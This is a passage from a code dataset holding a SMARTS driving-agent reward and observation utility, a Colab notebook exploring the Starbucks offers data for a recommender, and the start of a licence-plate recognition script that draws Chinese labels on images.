the current lane\n    max_ids = [i for i, d in enumerate(wps_len) if d == max_len]# if abs(i-env_obs.ego_vehicle_state.lane_index) <= 1 ]\n    # If there is more than one longest lane and none of them is near us -- this case should rarely happen\n    if len(max_ids) == 0:\n        global_max_len_lane_index = max_len_lane_index\n        return max_len_lane_index\n\n\n    neighborhood_vehicle_states = filter_neighborhood_vehicle_states(env_obs)\n    \n    for i in range(max_len):\n        if len(max_ids) == 1:\n\n            if safety_detect(env_obs, max_ids[0], env_obs.ego_vehicle_state.lane_index):\n                global_max_len_lane_index = max_ids[0]\n                return max_ids[0]\n            else:\n                return global_max_len_lane_index\n\n        for max_id in max_ids:\n            if point_in_neighbor_vehicle(env_obs, wp_paths[max_id][i].pos, neighborhood_vehicle_states):\n                max_ids.remove(max_id)\n\n    if global_max_len_lane_index in max_ids:\n        return global_max_len_lane_index\n    else:\n        i = 1\n        while True:\n            if min(global_max_len_lane_index+i, wp_paths_len-1) in max_ids:\n\n                if safety_detect(env_obs, global_max_len_lane_index+i, env_obs.ego_vehicle_state.lane_index):\n                    global_max_len_lane_index += i \n                    return global_max_len_lane_index\n                else:\n                    return global_max_len_lane_index\n\n            elif max(global_max_len_lane_index-i, 0) in max_ids:\n\n                if safety_detect(env_obs, global_max_len_lane_index-i, env_obs.ego_vehicle_state.lane_index):\n                    global_max_len_lane_index -= i\n                    return global_max_len_lane_index\n                else:\n                    return global_max_len_lane_index\n            i += 1\n\ndef detect_genJ(sample_wp_path):\n    for wp in sample_wp_path:\n        if 'gneJ' in wp.lane_id:\n            return True\n    return False\n\ndef detect_int_in_genJ(sample_wp_path, index):\n    if index >= len(sample_wp_path):\n        index = len(sample_wp_path) - 1\n\n\n    if 'gneJ' in sample_wp_path[index].lane_id:\n        return True\n    else:\n        return False\n\n\nfrom smarts.core.sensors import Observation\nfrom process import *\nfrom map.map import GridMap\n\ncbf_obs = CBFObservation()\nlinemap = GridMap.load(dir=\"map\", name=\"mid\")\nsidemap1 = GridMap.load(dir=\"map\", name=\"sidemap1\")\nsidemap2 = GridMap.load(dir=\"map\", name=\"sidemap2\")\n\n\ndef obs_Frenet(obs:Observation):\n    cbf_obs(obs)\n    return cbf_obs\n\ndef observation_adapter(env_obs:Observation):\n    \"\"\"\n    Transform the environment's observation into something more suited for your model\n    \"\"\"\n    # CBF information\n    cbf_obs = obs_Frenet(env_obs)\n    position = cbf_obs.ego.p\n    cxe, cye, re = linemap.curvature(position[0], position[1], size=[10, 10])\n    cbf_obs.r = re\n    cbf_obs.cxe = cxe\n    cbf_obs.cye = cye\n    # linemap.show3circle(\n    #     linemap.grid, sidemap1.grid, sidemap2.grid, [cxe, cye], re, cbf_obs\n    # )\n\n    min_dist, min_dist_rleative_heading = get_min_dist(env_obs)\n    detect_car = detect_sector_car(env_obs)\n\n\n    global global_last_len_wps_len\n    if env_obs.distance_travelled == 0.0:\n        global_last_len_wps_len = len(env_obs.waypoint_paths)\n\n    global global_in_genJ\n    global_in_genJ = 'gneJ' in env_obs.ego_vehicle_state.lane_id\n    # ================================================================\n    # normal info build\n    # ================================================================\n    ego_state = env_obs.ego_vehicle_state\n    wp_paths = env_obs.waypoint_paths\n    closest_wps = [path[0] for path in wp_paths]\n\n    # distance of vehicle from center of lane\n    closest_wp = min(closest_wps, key=lambda wp: wp.dist_to(ego_state.position))\n    signed_dist_from_center = closest_wp.signed_lateral_error(ego_state.position)\n    lane_hwidth = closest_wp.lane_width * 0.5\n    norm_dist_from_center = signed_dist_from_center / lane_hwidth\n\n\n    ego_lane_index = closest_wp.lane_index\n\n    # ================================================================\n    # lane info build\n    # ================================================================\n    (\n        lane_ttc,\n        lane_dist,\n        closest_lane_nv_rel_speed,\n        intersection_ttc,\n        intersection_distance,\n        closest_its_nv_rel_speed,\n        closest_its_nv_rel_pos,\n    ) = ttc_by_path(\n        ego_state, wp_paths, env_obs.neighborhood_vehicle_states, closest_wp\n    )\n\n    # ================================================================\n    # heading info build\n    # ================================================================\n    # wp heading errors in current lane in front of vehicle\n    indices = np.array([0, 1, 2, 3, 5, 8, 13, 21, 34, 50])\n\n    # solve case that wps are not enough, then assume the left heading to be same with the last valid.\n    wps_len = [len(path) for path in wp_paths]\n    max_len_lane_index = get_max_index_lane(env_obs)\n\n    last_wp_index = 0\n    for i, wp_index in enumerate(indices):\n        if wp_index > wps_len[max_len_lane_index] - 1:\n            indices[i:] = last_wp_index\n            break\n        last_wp_index = wp_index\n\n    global global_sample_wp_path\n    global_sample_wp_path = [wp_paths[max_len_lane_index][i] for i in indices]\n    heading_errors = [\n        math.sin(wp.relative_heading(ego_state.heading)) for wp in global_sample_wp_path\n    ]\n\n    # Prevent sudden lane-index jumps when extra lanes appear\n    global global_max_len_lane_index\n    len_wps_len = len(wps_len)\n    if len_wps_len > global_last_len_wps_len:\n        global_max_len_lane_index = 
env_obs.ego_vehicle_state.lane_index\n global_last_len_wps_len = len_wps_len\n\n global global_max_len_lane\n global_max_len_lane = wps_len[max_len_lane_index]\n \n wp_errors = np.array([wp.signed_lateral_error(ego_state.position) for wp in global_sample_wp_path])[:4]\n \n is_genJ = detect_genJ(global_sample_wp_path)\n\n wp_speed_limit = np.min(np.array([wp.speed_limit for wp in global_sample_wp_path]) / 120.) * 1.065\n \n if is_genJ:\n wp_speed_limit *= 0.9\n if wp_speed_limit > 0.19167:\n wp_speed_limit = 0.19167\n\n global global_lane_ttc\n lane_ttc, lane_dist = ego_ttc_calc(ego_lane_index, lane_ttc, lane_dist)\n global_lane_ttc = lane_ttc[2]\n\n global threaten_distance\n global head_threaten_distance\n global teal_threaten_distance\n threaten_distance, head_threaten_distance, teal_threaten_distance = threaten_via_intent(env_obs, env_obs.ego_vehicle_state.lane_index)\n # print(threaten_distance)\n # print(head_threaten_distance)\n # print(teal_threaten_distance)\n # print()\n # print(ego_state.speed)\n global global_int_in_gneJ\n global_int_in_gneJ = detect_int_in_genJ(wp_paths[max_len_lane_index], int(threaten_distance*20)-1)\n\n\n return {\n \"distance_from_center\": np.array([norm_dist_from_center]),\n \"heading_errors\": np.array(heading_errors),\n \"wp_errors\": wp_errors,\n \"wp_speed_penalty\": np.array([wp_speed_limit]),\n \"speed\": np.array([ego_state.speed / 120.]),\n \"steering\": np.array([ego_state.steering / (0.5 * math.pi)]),\n \"lane_ttc\": np.array(lane_ttc),\n \"lane_dist\": np.array(lane_dist),\n \"closest_lane_nv_rel_speed\": np.array([closest_lane_nv_rel_speed]),\n \"intersection_ttc\": np.array([intersection_ttc]),\n \"intersection_distance\": np.array([intersection_distance]),\n \"closest_its_nv_rel_speed\": np.array([closest_its_nv_rel_speed]),\n \"closest_its_nv_rel_pos\": np.array(closest_its_nv_rel_pos),\n \"min_dist\": np.array([min_dist / 5.0, min_dist_rleative_heading/ (np.pi * 2)]),\n \"detect_car\": detect_car,\n \"threaten_distance\": np.array([threaten_distance, head_threaten_distance, teal_threaten_distance]),\n \"cbf_obs\": cbf_obs\n }\n\n# ==================================================\n# reward function\n# ==================================================\ndef reward_adapter(env_obs, env_reward):\n \"\"\"\n Here you can perform your reward shaping.\n\n The default reward provided by the environment is the increment in\n distance travelled. 
Your model will likely require a more\n sophisticated reward function\n \"\"\"\n global lane_crash_flag\n distance_from_center = get_distance_from_center(env_obs)\n\n center_penalty = -np.abs(distance_from_center)\n\n # penalise close proximity to lane cars\n if lane_crash_flag:\n crash_penalty = -5\n else:\n crash_penalty = 0\n\n # penalise close proximity to intersection cars\n if intersection_crash_flag:\n crash_penalty -= 5\n\n total_reward = np.sum([1.0 * env_reward])\n total_penalty = np.sum([0.1 * center_penalty, 1 * crash_penalty])\n\n speed = env_obs.ego_vehicle_state.speed\n\n global global_sample_wp_path\n is_genJ = detect_genJ(global_sample_wp_path)\n wp_speed_limit = np.min(np.array([wp.speed_limit for wp in global_sample_wp_path]) ) * 1.065\n if is_genJ:\n wp_speed_limit *= 0.9\n if wp_speed_limit > 23:\n wp_speed_limit = 23\n speed_penalty = 0.0\n if speed > wp_speed_limit:\n speed_penalty = -1.0 * (speed - wp_speed_limit) * 0.3\n\n reach_goal_reward = 0.\n if env_obs.events.reached_goal:\n reach_goal_reward = 50.\n\n # safety guarantee\n global threaten_distance\n global head_threaten_distance\n global teal_threaten_distance\n safety_penalty = 0.\n if threaten_distance < 0.56:\n safety_penalty -= (0.56 - threaten_distance) * 1.0\n if head_threaten_distance < 0.5: \n safety_penalty -= (0.5 - head_threaten_distance) * 1.0\n if teal_threaten_distance < 0.5:\n safety_penalty -= (0.5 - teal_threaten_distance) * 1.0\n\n # safety guarantee 2: when wps_len is small, slow down, let the other car pass, then change lanes\n global global_max_len_lane\n\n safety_penalty_2 = 0.\n if global_max_len_lane < 45:\n safety_penalty_2 = speed-4. if speed >= 4. else 0.\n if global_max_len_lane < 30:\n safety_penalty_2 = speed-2. if speed >= 2. else 0.\n if global_max_len_lane < 15:\n safety_penalty_2 = speed\n safety_penalty_2 *= -0.5\n\n # safety guarantee 3: lane_ttc must stay above a threshold to remain safe\n global global_lane_ttc\n\n safety_penalty_3 = 0.\n if global_lane_ttc < 0.3:\n safety_penalty_3 = (global_lane_ttc - 0.3) * 2.0\n \n\n # safety_penalty_4 = 0.\n # if threaten_distance < 0.86:\n # safety_penalty_4 = speed-9. if speed >= 9. else 0.\n # if threaten_distance < 0.66:\n # safety_penalty_4 = speed-6. if speed >= 6. else 0.\n # if threaten_distance < 0.46:\n # safety_penalty_4 = speed-3. if speed >= 3. else 0.\n # if threaten_distance < 0.26:\n # safety_penalty_4 = speed-1. if speed >= 1. 
else 0.\n # safety_penalty_4 *= -1.0\n # safety_penalty_4 = np.clip(safety_penalty_4, -3, 0)\n\n return (total_reward + \n total_penalty + \n speed_penalty + \n reach_goal_reward# + \n #safety_penalty + \n #safety_penalty_2 + \n #safety_penalty_3 #+ \n #safety_penalty_4\n ) / 100.0 # scale down by a time-penalty coefficient\n\ndef action_adapter(model_action):\n assert len(model_action) == 2\n\n global threaten_distance\n global head_threaten_distance\n throttle = np.clip(model_action[0], 0, 1)\n brake = np.abs(np.clip(model_action[0], -1, 0))\n\n # global global_in_genJ\n\n global global_int_in_gneJ\n global global_max_len_lane\n\n if global_max_len_lane < 20:\n brake = 0.5\n\n if global_int_in_gneJ:\n if threaten_distance < 0.66:\n throttle = 0.\n brake = 1.\n if threaten_distance < 0.1:\n throttle = 0.\n brake = 1.\n\n if head_threaten_distance < 0.26:\n throttle = 0.\n brake = 1.\n\n #print(np.asarray([throttle, brake, model_action[1]]))\n return np.asarray([throttle, brake, model_action[1]])\n\n\ndef info_adapter(observation, reward, info):\n return info\n\n\nagent_interface = AgentInterface(\n max_episode_steps=None,\n waypoints=True,\n neighborhood_vehicles=NeighborhoodVehicles(radius=60),\n action=ActionSpaceType.Continuous, #LaneWithContinuousSpeed\n)\n\nagent_spec = AgentSpec(\n interface=agent_interface,\n observation_adapter=observation_adapter,\n reward_adapter=reward_adapter,\n action_adapter=action_adapter,\n info_adapter=info_adapter,\n)","repo_name":"Link2Link/MAC-CBF-RL","sub_path":"algos/utils/smarts_utils.py","file_name":"smarts_utils.py","file_ext":"py","file_size_in_byte":49605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
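The action_adapter above folds a single signed scalar into separate throttle and brake commands before appending the steering value. A minimal standalone sketch of that split (the function name and test values are illustrative, not from the source):

import numpy as np

def split_throttle_brake(signed_accel):
    """Map a signed acceleration in [-1, 1] to (throttle, brake), both in [0, 1]."""
    throttle = float(np.clip(signed_accel, 0, 1))        # positive part accelerates
    brake = float(np.abs(np.clip(signed_accel, -1, 0)))  # negative part brakes
    return throttle, brake

assert split_throttle_brake(0.7) == (0.7, 0.0)
assert split_throttle_brake(-0.4) == (0.0, 0.4)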
+{"seq_id":"13035859003","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport os\nproject_name = \"reco-tut-sor\"; branch = \"main\"; account = \"sparsh-ai\"\nproject_path = os.path.join('/content', project_name)\n\n\n# In[ ]:\n\n\nif not os.path.exists(project_path):\n get_ipython().system(u'cp /content/drive/MyDrive/mykeys.py /content')\n import mykeys\n get_ipython().system(u'rm /content/mykeys.py')\n path = \"/content/\" + project_name; \n get_ipython().system(u'mkdir \"{path}\"')\n get_ipython().magic(u'cd \"{path}\"')\n import sys; sys.path.append(path)\n get_ipython().system(u'git config --global user.email \"recotut@recohut.com\"')\n get_ipython().system(u'git config --global user.name \"reco-tut\"')\n get_ipython().system(u'git init')\n get_ipython().system(u'git remote add origin https://\"{mykeys.git_token}\":x-oauth-basic@github.com/\"{account}\"/\"{project_name}\".git')\n get_ipython().system(u'git pull origin \"{branch}\"')\n get_ipython().system(u'git checkout main')\nelse:\n get_ipython().magic(u'cd \"{project_path}\"')\n\n\n# In[103]:\n\n\nget_ipython().system(u'git status')\n\n\n# In[104]:\n\n\nget_ipython().system(u'git add . && git commit -m \\'commit\\' && git push origin \"{branch}\"')\n\n\n# ---\n\n# This data set contains simulated data that mimics customer behavior on the Starbucks rewards mobile app. Once every few days, Starbucks sends out an offer to users of the mobile app. An offer can be merely an advertisement for a drink or an actual offer such as a discount or BOGO (buy one get one free). Some users might not receive any offer during certain weeks.\n# \n# Not all users receive the same offer, and that is the challenge to solve with this data set.\n# \n# The task is to combine transaction, demographic and offer data to determine which demographic groups respond best to which offer type. This data set is a simplified version of the real Starbucks app because the underlying simulator only has one product whereas Starbucks actually sells dozens of products.\n# \n# Every offer has a validity period before the offer expires. As an example, a BOGO offer might be valid for only 5 days. You'll see in the data set that informational offers have a validity period even though these ads are merely providing information about a product; for example, if an informational offer has 7 days of validity, you can assume the customer is feeling the influence of the offer for 7 days after receiving the advertisement.\n# \n# The provided transactional data shows user purchases made on the app including the timestamp of purchase and the amount of money spent on a purchase. This transactional data also has a record for each offer that a user receives as well as a record for when a user actually views the offer. There are also records for when a user completes an offer.\n# \n# Let's keep in mind as well that someone using the app might make a purchase through the app without having received an offer or seen an offer.\n# \n# To give an example, a user could receive a discount offer buy 10 dollars get 2 off on Monday. The offer is valid for 10 days from receipt. If the customer accumulates at least 10 dollars in purchases during the validity period, the customer completes the offer.\n# \n# However, there are a few things to watch out for in this data set. Customers do not opt into the offers that they receive; in other words, a user can receive an offer, never actually view the offer, and still complete the offer. 
For example, a user might receive the \"buy 10 dollars get 2 dollars off offer\", but the user never opens the offer during the 10 day validity period. The customer spends 15 dollars during those ten days. There will be an offer completion record in the data set; however, the customer was not influenced by the offer because the customer never viewed the offer.\n# \n# You'll also want to take into account that some demographic groups will make purchases even if they don't receive an offer. From a business perspective, if a customer is going to make a 10 dollar purchase without an offer anyway, you wouldn't want to send a buy 10 dollars get 2 dollars off offer. You'll want to try to assess what a certain demographic group will buy when not receiving any offers.\n\n# ## Dataset\n# \n# The data is contained in three files:\n# \n# * portfolio.json - containing offer ids and meta data about each offer (duration, type, etc.)\n# * profile.json - demographic data for each customer\n# * transcript.json - records for transactions, offers received, offers viewed, and offers completed\n# \n# Here is the schema and explanation of each variable in the files:\n# \n# **portfolio.json**\n# * id (string) - offer id\n# * offer_type (string) - type of offer ie BOGO, discount, informational\n# * difficulty (int) - minimum required spend to complete an offer\n# * reward (int) - reward given for completing an offer\n# * duration (int) - time for offer to be open, in days\n# * channels (list of strings)\n# \n# **profile.json**\n# * age (int) - age of the customer \n# * became_member_on (int) - date when customer created an app account\n# * gender (str) - gender of the customer (note some entries contain 'O' for other rather than M or F)\n# * id (str) - customer id\n# * income (float) - customer's income\n# \n# **transcript.json**\n# * event (str) - record description (ie transaction, offer received, offer viewed, etc.)\n# * person (str) - customer id\n# * time (int) - time in hours since start of test. 
The data begins at time t=0\n# * value - (dict of strings) - either an offer id or transaction amount depending on the record\n\n# In[ ]:\n\n\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport math\nimport json\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nget_ipython().magic(u'matplotlib inline')\n\n\n# In[60]:\n\n\n# read in the json files\nportfolio = pd.read_json('./data/bronze/portfolio.json', orient='records', lines=True)\nprofile = pd.read_json('./data/bronze/profile.json', orient='records', lines=True)\ntranscript = pd.read_json('./data/bronze/transcript.json', orient='records', lines=True)\n\n\n# ## Portfolio\n\n# | attribute | description |\n# | --------- | ----------- |\n# | id | offer id |\n# | offer_type | type of offer ie BOGO, discount, informational |\n# | difficulty | minimum required spend to complete an offer |\n# | reward | reward given for completing an offer |\n# | duration | time for offer to be open, in days |\n# | channels | email, web, mobile |\n\n# In[61]:\n\n\nportfolio\n\n\n# In[62]:\n\n\nportfolio.info()\n\n\n# In[63]:\n\n\nportfolio.describe().round(1)\n\n\n# In[64]:\n\n\nfig, ax = plt.subplots(figsize=(12,7))\nportfolio.hist(ax=ax)\nplt.show()\n\n\n# In[65]:\n\n\nportfolio.describe(include='O')\n\n\n# In[66]:\n\n\nportfolio.channels.astype('str').value_counts().plot(kind='barh');\n\n\n# In[67]:\n\n\nportfolio.offer_type.value_counts().plot(kind='barh');\n\n\n# ## Transcript\n\n# In[68]:\n\n\ntranscript.head()\n\n\n# In[69]:\n\n\ntranscript.info()\n\n\n# In[70]:\n\n\ntranscript.describe().round(1).T\n\n\n# In[71]:\n\n\ntranscript.describe(include='O')\n\n\n# In[72]:\n\n\ntranscript.event.astype('str').value_counts().plot(kind='barh');\n\n\n# ## Profile\n\n# In[73]:\n\n\nprofile.head()\n\n\n# In[74]:\n\n\nprofile.info()\n\n\n# In[75]:\n\n\nprofile.describe().round(1)\n\n\n# In[76]:\n\n\nfig, ax = plt.subplots(figsize=(12,7))\nprofile.hist(ax=ax)\nplt.show()\n\n\n# In[77]:\n\n\nprofile.describe(include='O')\n\n\n# In[78]:\n\n\nprofile.gender.astype('str').value_counts(dropna=False).plot(kind='barh');\n\n\n# ## Cleaning the data and Feature Engineering\n# \n\n# In[79]:\n\n\ngroup_income = profile.groupby(['income', 'gender']).size().reset_index()\ngroup_income.columns = ['income', 'gender', 'count']\n\nsns.catplot(x=\"income\", y=\"count\", hue=\"gender\", data=group_income,\n kind=\"bar\", palette=\"muted\", height=5, aspect=12/5)\nplt.xlabel('Income per year')\nplt.ylabel('Count')\nplt.title('Age/Income Distribution')\nplt.savefig('./extras/images/income-age-dist-binned.png', dpi=fig.dpi)\n\n\n# In[80]:\n\n\nportfolio['web'] = portfolio['channels'].apply(lambda x: 1 if 'web' in x else 0)\nportfolio['email'] = portfolio['channels'].apply(lambda x: 1 if 'email' in x else 0)\nportfolio['mobile'] = portfolio['channels'].apply(lambda x: 1 if 'mobile' in x else 0)\nportfolio['social'] = portfolio['channels'].apply(lambda x: 1 if 'social' in x else 0)\n \n# apply one hot encoding to offer_type column\noffer_type = pd.get_dummies(portfolio['offer_type'])\n\n# drop the channels and offer_type column\nportfolio.drop(['channels', 'offer_type'], axis=1, inplace=True)\n\n# combine the portfolio and offer_type dataframe to form a cleaned dataframe\nportfolio = pd.concat([portfolio, offer_type], axis=1, sort=False)\n\n\n# In[81]:\n\n\nprofile['memberdays'] = datetime.datetime.today().date() - pd.to_datetime(profile['became_member_on'], format='%Y%m%d').dt.date\nprofile['memberdays'] = 
profile['memberdays'].dt.days\nprofile['income'] = profile['income'].fillna(0)\n\nprofile['gender'] = profile['gender'].fillna('X')\nprofile['gender'] = profile['gender'].map({'X':0,'O':1, 'M':2, 'F':3})\nincome_bins = [0, 20000, 35000, 50000, 60000, 70000, 90000, 100000, np.inf]\nlabels = [0,1,2,3,4,5,6,7]\nprofile['income'] = pd.cut(profile['income'], bins = income_bins, labels= labels, include_lowest=True)\n\n\n# In[82]:\n\n\n# Let's plot the same data and see if this provides us with better insights\n\ngroup_income = profile.groupby(['income', 'gender']).size().reset_index()\ngroup_income.columns = ['income', 'gender', 'count']\n\nsns.catplot(x=\"income\", y=\"count\", hue=\"gender\", data=group_income,\n kind=\"bar\", palette=\"muted\", height=5, aspect=12/5)\nplt.xlabel('Income per year')\nplt.ylabel('Count')\nplt.title('Age/Income Distribution')\nplt.savefig('./extras/images/income-age-dist-binned.png', dpi=fig.dpi)\n\n\n# ## Joining the data\n\n# In[87]:\n\n\ntranscript = transcript[transcript.person.notnull()]\n# extract ids for each offer\ntranscript['offer_id'] = transcript[transcript.event != 'transaction']['value'].apply(lambda x: \n dict(x).get('offer id') \n if dict(x).get('offer id') is not None \n else dict(x).get('offer_id') )\n\n# transaction events do not have an offer id, so we filter them out next\njoined_df = pd.merge(profile, transcript[transcript.event != 'transaction'], how='left', left_on=['id'], right_on=['person'])\njoined_df['event'] = joined_df['event'].map({'offer received': 0, 'offer viewed': 1, 'offer completed': 2})\n\n# rename column for easier joining of dataframes\nportfolio.rename({'id':'offer_id'}, inplace=True, axis=1)\n\n# now all data can be joined together\ndf = pd.merge(joined_df, portfolio, how='inner', left_on=['offer_id'], right_on=['offer_id'])\ndf = df.drop(['person', 'value'], axis=1)\n\ndf.head()\n\n\n# ## Exploring correlations\n# \n# Correlation is used to find which values are closely related with each other.\n# Now let's describe how values are correlated with each other. 
For simplicity, the size of the output dot encodes the strength of the correlation (the bigger the dot, the stronger the relation).\n\n# In[88]:\n\n\n#!mkdir images\ndef heatmap(x, y, size, figsize=(18,15), fig_name='temp.png'):\n fig, ax = plt.subplots(figsize=figsize)\n \n # Mapping from column names to integer coordinates\n x_labels = [v for v in sorted(x.unique())]\n y_labels = [v for v in sorted(y.unique())]\n x_to_num = {p[1]:p[0] for p in enumerate(x_labels)} \n y_to_num = {p[1]:p[0] for p in enumerate(y_labels)} \n \n size_scale = 500\n ax.scatter(\n x=x.map(x_to_num), # Use mapping for x\n y=y.map(y_to_num), # Use mapping for y\n s=size * size_scale, # Vector of square sizes, proportional to size parameter\n marker='s' # Use square as scatterplot marker\n )\n \n # Show column labels on the axes\n ax.set_xticks([x_to_num[v] for v in x_labels])\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\n ax.set_yticks([y_to_num[v] for v in y_labels])\n ax.set_yticklabels(y_labels)\n fig.savefig(fig_name, dpi=fig.dpi)\n \noffer_specs = ['difficulty', 'duration', 'reward', 'web',\n 'email', 'mobile', 'social', 'bogo', 'discount', 'informational']\nuser_specs = ['age', 'became_member_on', 'gender', 'income', 'memberdays']\n\ncorr = df[offer_specs + user_specs + ['event']].corr()\ncorr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\ncorr.columns = ['x', 'y', 'event']\nheatmap(\n x=corr['x'],\n y=corr['y'],\n size=corr['event'].abs(),\n fig_name='./extras/images/heatmap-general.png'\n)\n\n\n# Correlation between the features seems to be quite weak. However, it can be noted that `bogo` is strongly related to the `discount` and `reward` fields, while the `mobile` channel is correlated with the `difficulty` field, which is quite expected.\n# \n# Now let's look more closely at the columns of interest and decide whether they should be cleaned or changed.\n\n# In[89]:\n\n\ncorr = df[['income', 'gender','event']].corr()\ncorr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\ncorr.columns = ['x', 'y', 'value']\nheatmap(\n x=corr['x'],\n y=corr['y'],\n size=corr['value'].abs(),\n figsize=(4,4),\n fig_name='./extras/images/heatmap-event.png'\n)\n\n\n# ## Building Recommendation matrix\n\n# At the moment the data has, for each user, an entry for each offer that was received, viewed or responded to.\n# To be able to give valid recommendations we keep only the last user action on each offer (either viewed, responded or ignored).\n\n# In[ ]:\n\n\ndf[(df.id == '68be06ca386d4c31939f3a4f0e3dd783') & (df.offer_id == '2906b810c7d4411798c6938adc9daaa5')]\n\n\n# In[97]:\n\n\nusers = df['id'].unique()\noffers = df['offer_id'].unique()\nrecommendation_df = pd.DataFrame(columns=df.columns)\n\nrecommendation_df.head()\n\n\n# In[ ]:\n\n\nprint(\"Number of known users: \", len(users))\nprint(\"Number of created offers: \", len(offers))\n\n\n# In[98]:\n\n\nfor i, offer in enumerate(offers):\n for j, user in enumerate(users):\n offer_id_actions = df[(df.id == user) & (df.offer_id == offer)]\n # log progress \n if j % 5000 == 0:\n print('Processing offer %s for user with index: %s' % (i, j)) \n if len(offer_id_actions) > 1:\n # user viewed or responded to the offer\n if offer_id_actions[offer_id_actions.event == 2]['event'].empty == False:\n # user completed the offer\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 2])\n elif offer_id_actions[offer_id_actions.event == 1]['event'].empty == 
False:\n # user only viewed the offer\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 1])\n else:\n # the offer could have been received multiple times but ignored\n #print(\"Filter length\", len())\n #print(\"No event were found in filtered data\\n:\", offer_id_actions)\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 0])\n else:\n # offer has been ignored\n recommendation_df = recommendation_df.append(offer_id_actions[offer_id_actions.event == 0])\n\n\n# In[99]:\n\n\nrecommendation_df.head()\n\n\n# In[100]:\n\n\nrecommendation_df['event'][10000:50000].map({0:'offer received', 1: 'offer viewed', 2: 'offer completed'}).value_counts().plot.pie(figsize=(7, 7), \n title=\"Event Pie Chart\", \n autopct='%1.1f%%', \n legend=True)\n\n\n# In[90]:\n\n\ngr = df.groupby(['id','offer_id'])\nuser_actions = pd.concat([gr.tail(1)]).reset_index(drop=True)\nuser_actions.head()\n\n\n# In[91]:\n\n\nuser_actions[user_actions.id == 'e12aeaf2d47d42479ea1c4ac3d8286c6']\n\n\n# In[92]:\n\n\nuser_actions['event'][0:1000].map({0:'offer received', 1: 'offer viewed', 2: 'offer completed'}).value_counts().plot.pie(figsize=(7, 7), \n title=\"Event Pie Chart\", \n autopct='%1.1f%%', \n legend=True)\n\n\n# The final user/offer datasets look pretty good; however, we are still not able to extract some actions performed by users, especially when filtering duplicates. This might be caused by offers that were received twice.\n# \n# Let's filter them and explore once more.\n\n# In[93]:\n\n\nuser_actions = user_actions.drop_duplicates(subset=['id', 'offer_id'], keep=False)\n\nuser_actions[user_actions.id == 'e12aeaf2d47d42479ea1c4ac3d8286c6' ]\n\n\n# In[94]:\n\n\nuser_actions['event'][0:1000].map({0:'offer received', 1: 'offer viewed', 2: 'offer completed'}).value_counts().plot.pie(figsize=(7, 7), \n title=\"Event Pie Chart\", \n autopct='%1.1f%%', \n legend=True)\n\n\n# Now the matrices look pretty similar and we are ready to build the Recommendation Engine.\n\n# In[101]:\n\n\nrecommendation_df.to_csv('./data/silver/userdata.csv', index=False)\n\n\n# In[102]:\n\n\nuser_actions.to_csv('./data/silver/useractions.csv', index=False)\n\n\n# If we look closely at how the event outcome is related to gender or income, we can notice that the correlation is quite weak, so additional parameters should definitely be taken into account.\n","repo_name":"sparsh-ai/reco-tut-sor","sub_path":"code/nbs/reco-tut-sor-t1-01-eda.py","file_name":"reco-tut-sor-t1-01-eda.py","file_ext":"py","file_size_in_byte":17379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
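The nested loop above rebuilds recommendation_df row by row with DataFrame.append, which is quadratic in users x offers and deprecated in recent pandas. A vectorized sketch of the same keep-the-most-advanced-event rule, assuming the same df layout with 'id', 'offer_id' and numeric 'event' columns (this mirrors the groupby/tail approach the notebook already uses for user_actions):

import pandas as pd

def last_action_per_offer(df: pd.DataFrame) -> pd.DataFrame:
    # events are coded 0=received, 1=viewed, 2=completed, so sorting by 'event'
    # within each (id, offer_id) group and keeping the last row reproduces the
    # loop's priority: completed over viewed over received
    ordered = df.sort_values(['id', 'offer_id', 'event'])
    return ordered.groupby(['id', 'offer_id']).tail(1)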
+{"seq_id":"21737879884","text":"# import argparse\nimport os\nimport sys\nfrom pathlib import Path\nimport numpy\nimport torch\n# import torch.backends.cudnn as cudnn\nfrom read_plate import ReadPlate\nimport cv2\nFILE = Path(__file__).resolve()\nROOT = FILE.parents[0] # YOLOv5 root directory\nif str(ROOT) not in sys.path:\n sys.path.append(str(ROOT)) # add ROOT to PATH\nROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative\n\nfrom PIL import Image, ImageDraw, ImageFont\n\n\n\ndef DrawChinese(img, text, positive, fontSize=20, fontColor=(\n 255, 0, 0)): # args: img (numpy.ndarray), text (the Chinese text to draw), positive (position), fontSize (font size, default 20), fontColor (font color, default red)\n cv2img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # cv2 and PIL store color channels in different orders (BGR vs. RGB)\n pilimg = Image.fromarray(cv2img)\n # draw the Chinese characters on the PIL image\n draw = ImageDraw.Draw(pilimg) # drawing handle for the image\n font = ImageFont.truetype(\"MSJHL.TTC\", fontSize, encoding=\"utf-8\") # arg 1: font file path, arg 2: font size\n draw.text(positive, text, fontColor, font=font) # arg 1: position, arg 2: text, arg 3: font color, arg 4: font\n cv2charimg = cv2.cvtColor(numpy.array(pilimg), cv2.COLOR_RGB2BGR) # convert the PIL image back to a cv2 image\n return cv2charimg\n\nif __name__ == '__main__':\n import os\n\n class_name = ['main']\n root = r'D:\zcd\CV\3'\n \n read_plate = ReadPlate()\n count = 0\n\n for image_name in os.listdir(root):\n image_path = f'{root}/{image_name}'\n image = cv2.imread(image_path)\n \n plates = []\n result=read_plate(image)\n if result:\n plate_name, (x11, y11, x22, y22) = result[0]\n \n x11, y11, x22, y22 = int(x11), int(y11), int(x22), int(y22)\n image = cv2.rectangle(image, (x11 - 5, y11 - 5), (x22 + 5, y22 + 5), (0, 0, 255), 2)\n image = DrawChinese(image, plate_name, (x11, y22), 160)\n print(image_name)\n 